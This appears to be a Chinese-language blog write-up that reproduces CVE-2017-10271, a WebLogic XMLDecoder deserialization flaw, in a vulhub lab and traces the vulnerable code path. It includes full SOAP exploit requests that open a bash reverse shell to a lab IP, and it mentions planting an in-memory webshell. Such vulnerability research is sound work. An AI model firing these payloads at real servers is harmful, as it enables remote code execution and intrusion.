Weblogic反序列化漏洞(CVE-2017-10271)
2022-08-03 03:37:36 # Java安全 # CVE

复现

[参考](weblogic漏洞分析之CVE-2017-10271 - 先知社区 (aliyun.com))

vulhub一键部署

img

远程调试没问题

反弹shell

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.30.140:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
Content-Length: 642

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.30.128/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

img

这里是用工具写入内存马再去连接的,冰蝎4.0.1似乎连不上,因为秘钥是写在代码中的
这里注入内存马是单独设置的密码
还是使用的3.x版本去连接的

在这里插入图片描述

在这里插入图片描述

漏洞分析

本文的重点还是放在代码上

CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞

http://url:port/wls-wsat/CoordinatorPortType
post发送数据包
再构造SOAP(XML)格式的请求解析过程中触发XMLDecoder反序列化漏洞

由于class体量太大
这里我就反编译了weblogic的jar
需者自取
提取码:9x8l

wlserver_10.3\server\lib\weblogic.jar!\weblogic\wsee\jaxws\workcontext\WorkContextServerTube.classprocessRequest方法

这里的var1传入的是XML数据
在这里插入图片描述
经过修饰后变成var3进入到readHeaderOld方法

前面的获取了POST数据包中XML参数
后面通过ByteArrayInputStream将XML数据变成字节数组输出流赋值给var4
在这里插入图片描述

这里如果调试成功的是可以看到var4的格式就是poc中的XML部分

1
2
3
4
5
<java version="1.7.0_80" class="java.beans.XMLDecoder">  
	      <new class="java.lang.ProcessBuilder">  
	           <string>calc</string><method name="start"/>  
	      </new>  
	</java>

var4.toByteArray():将var4的内容转为字节数组,然后传入ByteArrayInputStream转化为流。
WorkContextXmlInputAdapter类,将接受道德输入流再转换成XMLDecoder
在这里插入图片描述

之后进入执行receive( )函数。
跟进到WorkContextLocalMap类下的receiveRequest方法

其中调用了WorkContextEntryImplreadEntry方法
在这里插入图片描述
最后到WorkContextXmlInputAdapter下的readUTF
在这里插入图片描述

此处调用了xmlDecoder.readObject

最终执行了执行了XML数据中的ProcessBuilder.start()

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.30.129/7890 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Prev
2022-08-03 03:37:36 # Java安全 # CVE
Next